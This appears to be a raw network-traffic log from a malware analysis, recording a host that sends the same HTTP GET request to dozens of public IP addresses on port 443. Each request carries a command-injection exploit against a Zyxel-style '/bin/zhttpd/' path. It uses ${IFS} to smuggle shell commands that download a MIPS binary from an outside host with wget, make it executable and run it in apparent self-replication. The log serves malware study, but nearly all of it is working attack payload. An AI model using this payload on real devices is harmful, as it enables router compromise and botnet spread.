                                                Jan 29, 2024 07:07:57.527004957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6762192.168.2.2353606188.16.82.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527060986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6763192.168.2.2338338136.70.52.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527090073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6764192.168.2.2356554100.1.43.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527124882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6765192.168.2.2355790194.111.43.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527148962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6766192.168.2.235606091.2.132.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527184010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6767192.168.2.2341288142.158.130.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527230978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6768192.168.2.2342122160.34.250.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527273893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6769192.168.2.235989277.80.26.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527319908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6770192.168.2.2340776191.132.240.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527367115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6771192.168.2.2337818139.137.198.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527394056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6772192.168.2.2354334101.194.70.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527434111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6773192.168.2.2356114144.234.197.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527479887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6774192.168.2.2344804203.55.134.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527502060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6775192.168.2.2349516165.142.24.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527559042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6776192.168.2.235420432.124.10.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527597904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6777192.168.2.2355154182.238.37.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527637959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6778192.168.2.2340650112.237.1.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527669907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6779192.168.2.234990658.162.163.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527678013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6780192.168.2.2338494199.208.53.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527726889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6781192.168.2.233497097.243.58.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527767897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6782192.168.2.2346720112.221.107.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527803898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6783192.168.2.2349874166.9.230.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527861118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6784192.168.2.233914018.159.119.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527894020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6785192.168.2.2338298199.19.204.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527910948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6786192.168.2.234354895.71.223.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527956009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6787192.168.2.2352762173.52.152.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.527995110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6788192.168.2.2339188138.89.139.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528032064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6789192.168.2.2340544197.84.12.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528068066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6790192.168.2.2360970223.151.78.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528094053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6791192.168.2.234151888.212.70.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528155088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6792192.168.2.2339710192.203.173.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528191090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6793192.168.2.2354032159.247.254.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528238058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6794192.168.2.2347730196.46.234.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528263092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6795192.168.2.2351758179.61.231.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528292894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6796192.168.2.235542491.193.60.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528327942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6797192.168.2.2353456109.199.69.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528384924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6798192.168.2.235934424.63.2.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528402090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6799192.168.2.23529685.10.146.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528454065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6800192.168.2.234868249.172.198.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528516054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6801192.168.2.2336032213.248.103.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528541088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6802192.168.2.233653078.99.227.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528559923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6803192.168.2.2349168185.72.144.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528620005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6804192.168.2.233538490.242.94.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528656006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6805192.168.2.2336378111.178.53.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528681040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6806192.168.2.2343366183.45.3.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528738976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6807192.168.2.2356460218.173.85.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528788090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6808192.168.2.233568244.134.114.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528820038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6809192.168.2.235052680.243.4.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528857946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6810192.168.2.235292465.241.82.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528917074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6811192.168.2.234044060.90.207.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528978109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6812192.168.2.234391661.187.144.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.528995991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6813192.168.2.2351188142.198.125.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529047012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6814192.168.2.234250071.166.46.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529092073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6815192.168.2.2341486135.32.113.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529117107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6816192.168.2.235798465.155.29.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529170036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6817192.168.2.2334652128.140.137.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529172897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6818192.168.2.2353564172.140.27.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529231071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6819192.168.2.233978078.192.104.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529258966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6820192.168.2.233645896.107.95.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529269934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6821192.168.2.2343312138.197.124.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529330969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6822192.168.2.2349266107.237.230.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529388905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6823192.168.2.2349262204.180.148.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529437065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6824192.168.2.234181090.90.174.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.529476881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6825192.168.2.234120093.239.187.137443
                                                TimestampBytes transferredDirectionData
